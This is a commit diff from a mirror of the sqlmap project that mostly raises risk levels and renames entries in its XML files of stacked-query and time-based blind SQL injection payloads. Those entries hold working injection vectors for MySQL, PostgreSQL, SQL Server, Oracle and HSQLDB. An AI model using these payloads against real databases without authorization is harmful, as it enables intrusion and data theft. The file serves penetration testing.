sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-01-24 00:04:23 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor stacked queries and time-based payloads cleanup - issue #1169

Browse Source
This commit is contained in:
Bernardo Damele 2015-02-20 15:44:06 +00:00
parent 79d4d970a5
commit 3b3205c532
2 changed files with 30 additions and 29 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
xml/payloads/04_stacked_queries.xml
View File

@ -6,7 +6,7 @@
<title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title> <title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
<stype>4</stype> <stype>4</stype>
<level>2</level> <level>2</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@ -26,7 +26,7 @@
<title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title> <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
<stype>4</stype> <stype>4</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
@ -47,7 +47,7 @@
<title>MySQL &gt; 5.0.11 stacked queries</title> <title>MySQL &gt; 5.0.11 stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>1</level> <level>1</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector> <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
@ -88,7 +88,7 @@
<title>PostgreSQL &gt; 8.1 stacked queries</title> <title>PostgreSQL &gt; 8.1 stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>1</level> <level>1</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector> <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@ -129,7 +129,7 @@
<title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title> <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
<stype>4</stype> <stype>4</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector> <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
@ -151,7 +151,7 @@
<title>Microsoft SQL Server/Sybase stacked queries</title> <title>Microsoft SQL Server/Sybase stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>1</level> <level>1</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector> <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@ -173,7 +173,7 @@
<title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title> <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
<stype>4</stype> <stype>4</stype>
<level>5</level> <level>5</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector> <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
@ -213,7 +213,7 @@
<title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title> <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
<stype>4</stype> <stype>4</stype>
<level>5</level> <level>5</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector> <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
@ -233,7 +233,7 @@
<title>Oracle stacked queries (USER_LOCK.SLEEP)</title> <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
<stype>4</stype> <stype>4</stype>
<level>5</level> <level>5</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector> <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
@ -295,7 +295,7 @@
<title>HSQLDB &gt;= 1.7.2 stacked queries</title> <title>HSQLDB &gt;= 1.7.2 stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector> <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
@ -316,7 +316,7 @@
<title>HSQLDB &gt;= 2.0 stacked queries</title> <title>HSQLDB &gt;= 2.0 stacked queries</title>
<stype>4</stype> <stype>4</stype>
<level>4</level> <level>4</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector> <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>

37
xml/payloads/05_time_blind.xml
View File

@ -207,7 +207,7 @@
<title>Microsoft SQL Server/Sybase time-based blind</title> <title>Microsoft SQL Server/Sybase time-based blind</title>
<stype>5</stype> <stype>5</stype>
<level>1</level> <level>1</level>
<risk>0</risk> <risk>1</risk>
<clause>0</clause> <clause>0</clause>
<where>1</where> <where>1</where>
<vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector> <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
@ -931,12 +931,13 @@
<!-- TODO: if possible, add payload for Microsoft Access --> <!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of OR time-based blind tests --> <!-- End of OR time-based blind tests -->
<!-- Time-based tests - After ORDER BY...LIMIT... --> <!-- Time-based tests - LIMIT clause -->
<!-- This payload does not work with SLEEP() -->
<test> <test>
<title>MySQL &gt;= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title> <title>MySQL &gt;= 5.1 heavy-query time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>2</risk>
<clause>1,2,3,4,5</clause> <clause>1,2,3,4,5</clause>
<where>1</where> <where>1</where>
<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector> <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>
@ -951,7 +952,7 @@
<dbms_version>&gt; 5.0.11</dbms_version> <dbms_version>&gt; 5.0.11</dbms_version>
</details> </details>
</test> </test>
<!-- Time-based tests - After ORDER BY...LIMIT... --> <!-- Time-based tests - LIMIT clause -->
<!-- Time-based blind tests - Parameter replace --> <!-- Time-based blind tests - Parameter replace -->
<test> <test>
@ -1177,7 +1178,7 @@
<title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title> <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>1</risk>
<clause>1,3</clause> <clause>1,3</clause>
<where>3</where> <where>3</where>
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector> <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
@ -1351,9 +1352,9 @@
<!-- End of time-based blind tests - Parameter replace --> <!-- End of time-based blind tests - Parameter replace -->
<!-- Time-based blind tests - GROUP BY and ORDER BY clauses --> <!-- Time-based blind tests - GROUP BY and ORDER BY clause -->
<test> <test>
<title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title> <title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clause</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1373,7 +1374,7 @@
</test> </test>
<test> <test>
<title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
@ -1392,7 +1393,7 @@
</test> </test>
<test> <test>
<title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title> <title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clause</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1412,7 +1413,7 @@
</test> </test>
<test> <test>
<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
@ -1431,7 +1432,7 @@
</test> </test>
<test> <test>
<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title> <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1473,10 +1474,10 @@
</test> </test>
<test> <test>
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title> <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_LOCK.SLEEP)</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>0</risk> <risk>1</risk>
<clause>2,3</clause> <clause>2,3</clause>
<where>1</where> <where>1</where>
<vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector> <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
@ -1492,7 +1493,7 @@
</test> </test>
<test> <test>
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title> <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
@ -1511,7 +1512,7 @@
</test> </test>
<test> <test>
<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>Oracle time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
@ -1530,7 +1531,7 @@
</test> </test>
<test> <test>
<title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
@ -1551,7 +1552,7 @@
</test> </test>
<test> <test>
<title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> <title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>